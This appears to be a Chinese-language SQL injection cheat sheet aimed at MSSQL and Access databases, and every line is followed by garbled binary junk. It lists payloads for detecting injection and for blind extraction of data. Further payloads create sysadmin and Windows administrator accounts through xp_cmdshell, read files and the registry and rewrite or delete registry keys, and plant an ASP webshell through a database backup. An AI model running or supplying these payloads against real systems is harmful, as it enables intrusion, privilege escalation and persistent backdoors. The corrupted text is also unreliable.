1.判断是否有注入;and 1=1 ;and 1=2 ��� 3+��"z
2.初步判断是否是mssql ;and user>0 yef@V�2�Z+
�`p9�h$d��
3.注入参数是字符'and [查询条件] and ''=' ��d}%GHvOi
+C�k<tx3h&
4.搜索时没过滤参数的'and [查询条件] and '%25'=' GW�RKiTu9�
? e%P�vy<i
5.判断数据库系统 q�R!SwG44+
�]1�rr$f9
;and (select count(*) from sysobjects)>0 mssql �RUm�1;MWs
�Fsv%=E��{
;and (select count(*) from msysobjects)>0 access MsCY5��g�
��IX;u�+B
C/ow{��MxA
�9�f;�\fe�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 |�"DQ^)3Pi
�Q��� �u2W
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �21M@z(q*�
/o�g�2�+!�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 $@��[6j��y
?AX./LI�
9.(1)猜字段的ascii值(access) #�
9Z];�<g
�P-[�6xu+]
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �SfQ��,uD6
F))��+a&O�
(2)猜字段的ascii值(mssql) ~oz8B^7i;�
K[PIw}V$?:
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �\�M�Q|��(
R�er\=�'
10.测试权限结构(mssql) "�CBe$��b4
�W1M<6T.{7
�=:mD)oX*
)�P@t,mxW/
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |i7|QL�UT�
3�,e^;��{w
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Hn0�,LH$/�
0Z8K�+,�'!
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- n
� !]_o�
dG�f{d7�D�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- G%-[vk#��]
A�f1m�Tbf=
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ���2�#�ND(
�B.�6g�J2c
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 2�ksX6M3kY
I�IU�oB!�`
;and 1=(select IS_MEMBER('db_owner'));-- ]wWN~G)2lV
U)=�?�3}s(
^k]OQc�7q'
w��q�J^tA!
11.添加mssql和系统的帐户 �3|-)]^1�O
gI6.��/;;x
;exec master.dbo.sp_addlogin username;-- p E�lF,�Y
;exec master.dbo.sp_password null,username,password;-- D`,W���1Z#
d%NO_=�I.
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3i=+��� [
fmY=S�qQG-
;exec master.dbo.xp_cmdshell 'net user username password F#eZ�f��j~
A#RA;Dt��:
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 5;o��WF�l�
I�M|V�GT0
;exec master.dbo.xp_cmdshell 'net user username password /add';-- xrxORt�J<�
�:o?���On/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- IQf��:a�X�
b��EyZ�RG
&z8@�� rk|
�=o;�8xKj�
12.(1)遍历目录 &]3_ �.C
6�MvjNb��Q
;create table dirs(paths varchar(100), id int) 7RM�$%'n�\
lX/s ���Q
;insert dirs exec master.dbo.xp_dirtree 'c:\' �:^j`wd1
h
q�+5��g+�9
;and (select top 1 paths from dirs)>0 ^.a�Fns{wv
K[PH#dF5,x
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) UUc{1"z�{�
lt`�(R�*B%
a�`� �A V�
QI�'�ul��e
(2)遍历目录 t J
N;WK.6
!E�8y!|�7$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �v\PqhI�y"
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 C�|�b��nUN
x>�d,\{��U
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 EE(�1;]�d-
#S)���+e�H
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �WM$}1�:O�
'`&gSL.1a@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 nh"nSBRx�k
UUJbF$�@�;
�o�P;"�`^_
�109�dB$+$
13.mssql中的存储过程 8+5�#�F�C7
9`VgD<?v�
xp_regenumvalues 注册表根键, 子键 Fy37I/#)r&
c1B�<�9�_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �E5�8fY|9�
d�c.9�:u*w
xp_regread 根键,子键,键值名 C?�m2R(RF�
w$8S�u�:g=
;exec xp_regread �b�YQvh/(J
�0F> �il�s
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 "c` �$U]M%
_ dEc? R}�
xp_regwrite 根键,子键, 值名, 值类型, 值 FOV�g��hq@
}vz��P��\
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �Q$�_y +�[
~��o_0R��B
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >uT,Z�,7�O
/5 yjON�{�
xp_regdeletevalue 根键,子键,值名 �&u&+:��m�
X)^eaw]�Q0
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 E7X6S�h�ng
A�Gu#*,�K�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Z>�
�Jm���
.P(k �|D&�
p^QZGu-.W�
B�B�uI|lr
14.mssql的backup创建webshell j}�O~�6A>|
�n]�:Xmi8p
use model 4o?_��G[�
"� �O0p�.o
create table cmd(str image); E�ZnX��S"z
��U|SF;T
.
insert into cmd(str) values (''); 36"-c�GNr{
S"��hA�@j�
backup database model to disk='c:\l.asp'; )t��Yu3�*'
" E+V�>V+�
�Cge@A'�2
yTJ Eo\g/@
15.mssql内置函数 G#yv$L�Y#�
!jlLF:v|1A
;and (select @@version)>0 获得Windows的版本号 �%PA�#x36�
c"D�%c(:4|
;and user_name()='dbo' 判断当前系统的连接用户是不是sa E$l�4v>i�A
#C^��)W/dP
;and (select user_name())>0 爆当前系统的连接用户 @�A�32|p}�
fk%�W0�7x!
;and (select db_name())>0 得到当前连接的数据库 8R|���!�$P
h��;�"� 9.
�{<ms;O�i'
p1t��q��wV
16.简洁的webshell IE*��eDj��
>D�]g:t�@v
use model ]90BI�J]*c
6[+@#I��Wx
create table cmd(str image); �@7�S*
�]�
�((0nJ�Jjz
insert into cmd(str) values (''); 0b=1�Ce+0q
(U�@K�s �)
backup database model to disk='g:\wwwtest\l.asp';
